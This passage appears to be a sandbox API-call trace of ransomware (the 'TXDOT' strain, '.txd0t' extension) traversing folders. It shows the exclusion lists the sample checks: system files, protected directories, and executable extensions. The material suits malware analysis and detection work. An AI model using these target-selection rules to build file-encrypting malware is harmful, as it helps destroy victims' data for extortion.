ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5834b1e1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58371386, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.727] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.728] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.728] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0128.728] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0128.728] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1038\\!TXDOT_READ_ME!.txt" [0128.728] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.728] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.728] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x129e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.728] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.728] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.728] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0128.728] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0128.728] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t" [0128.728] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.728] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.728] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58478a65, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x153aa, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.728] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.728] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.728] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0128.728] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0128.728] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.txd0t" [0128.728] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.728] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.729] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.729] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.729] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.729] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0128.729] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0128.729] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" [0128.729] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.729] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.729] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.729] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.729] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.729] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.729] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.729] GetProcessHeap () returned 0xe30000 [0128.729] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.729] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5848a111, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5848a111, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1040", cAlternateFileName="")) returned 1 [0128.729] StrCmpW (psz1="1040", psz2=".") returned 1 [0128.729] StrCmpW (psz1="1040", psz2="..") returned 1 [0128.729] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.729] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.729] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1040", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\system32\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\system\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\local\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\boot\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\perflogs\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\programdata\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\drivers\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\wsus\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="crypt_detect") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="cryptolocker") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="ransomware") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\WINDOWS") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.730] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\Program Files") returned 0x0 [0128.730] GetProcessHeap () returned 0xe30000 [0128.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.730] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0128.730] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\*") returned="C:\\588bce7c90097ed212\\1040\\*" [0128.730] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5848a111, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5848a111, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.730] StrCmpW (psz1=".", psz2=".") returned 0 [0128.730] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5848a111, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5848a111, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.730] StrCmpW (psz1="..", psz2=".") returned 1 [0128.731] StrCmpW (psz1="..", psz2="..") returned 0 [0128.731] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5839765f, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5839765f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5839765f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.731] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.731] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.731] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0128.731] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0128.731] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1040\\!TXDOT_READ_ME!.txt" [0128.731] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.731] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.731] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.731] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5839765f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x103b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.731] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.731] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.731] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0128.731] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0128.731] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t" [0128.731] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.731] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.731] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5847b11e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13abc, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.731] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.731] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.731] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0128.731] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0128.732] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.txd0t" [0128.732] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.732] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.732] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.732] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.732] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.732] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0128.732] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0128.732] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" [0128.732] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.732] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.732] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.732] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.732] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.732] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.732] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.732] GetProcessHeap () returned 0xe30000 [0128.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.732] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x585ab28c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1041", cAlternateFileName="")) returned 1 [0128.732] StrCmpW (psz1="1041", psz2=".") returned 1 [0128.732] StrCmpW (psz1="1041", psz2="..") returned 1 [0128.733] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.733] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.733] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1041", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\system32\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\system\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\roaming\\") returned 0x0 